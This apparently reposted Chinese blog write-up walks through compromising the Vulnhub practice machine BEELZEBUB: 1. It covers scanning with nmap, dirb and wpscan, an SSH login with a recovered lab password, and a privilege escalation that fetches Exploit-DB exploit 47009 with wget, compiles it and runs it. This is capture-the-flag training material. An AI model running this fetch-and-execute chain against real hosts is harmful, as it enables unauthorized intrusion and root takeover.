(Vulnhub靶场)BEELZEBUB: 1 write up


文章目录

    • 环境准备
    • 信息搜集
    • 漏洞利用
    • 权限提升


环境准备

靶机地址:https://www.vulnhub.com/

kali攻击机ip:192.168.220.128
靶机 ip:

靶机地址:
使用命令:

arp-scan -l   

探测发现是:192.168.220.134

信息搜集

nmap -T4 -p- -A 192.168.220.134

发现开放22、80端口,

(Vulnhub靶场)BEELZEBUB: 1 write up_第1张图片
打开web页面发现是apache默认页面,直接dirb扫描一下目录

dirb http://192.168.220.134

这里访问一下index.php,发现响应码是200,但是页面却不是正常的,而且版本号和扫描出来的不符合。猜测是自己写的页面。
(Vulnhub靶场)BEELZEBUB: 1 write up_第2张图片
查看源代码,发现有异常信息。说是beelzebud 、md5,试着把beelzebud用md5加密:d18e1e22becbd915b45e0e655429d487 ,然后
dirb http://192.168.220.134/d18e1e22becbd915b45e0e655429d487 扫描一下这个目录下面的东西。

(Vulnhub靶场)BEELZEBUB: 1 write up_第3张图片
扫描发现有使用worpress搭建的博客系统,还有一个是
(Vulnhub靶场)BEELZEBUB: 1 write up_第4张图片
(Vulnhub靶场)BEELZEBUB: 1 write up_第5张图片

漏洞利用

这里也没找到有用的信息,用wpscan找一下漏洞把。

wpscan --api-token=fQJaC0KWwb****9ycuuE04O7ZPMpz65ri1pHA --url=http://192.168.220.134/d18e1e22becbd915b45e0e655429d487/ -e --plugins-detection aggressive --ignore-main-redirect --force

然后是找到了两个用户,然后把用户名写到刚才的php页面,krampus和valak,然后查看cookie会显示密码:M4k3Ad3a1,然后用ssh登录一下。
(Vulnhub靶场)BEELZEBUB: 1 write up_第6张图片
(Vulnhub靶场)BEELZEBUB: 1 write up_第7张图片
这里也是登陆成功了。

ssh [email protected]

(Vulnhub靶场)BEELZEBUB: 1 write up_第8张图片
切换到桌面,也是拿到第一个flag
(Vulnhub靶场)BEELZEBUB: 1 write up_第9张图片

权限提升

history // 查看历史命令

发现有下载提权脚本的操作,我们也复现一下。
(Vulnhub靶场)BEELZEBUB: 1 write up_第10张图片
一番操作后也是成功提权,拿到flag

wget https://www.exploit-db.com/download/47009
mv 47009 ./exploit.c
gcc exploit.c -o exploit
./exploit

(Vulnhub靶场)BEELZEBUB: 1 write up_第11张图片

你可能感兴趣的:(安全,web安全,linux)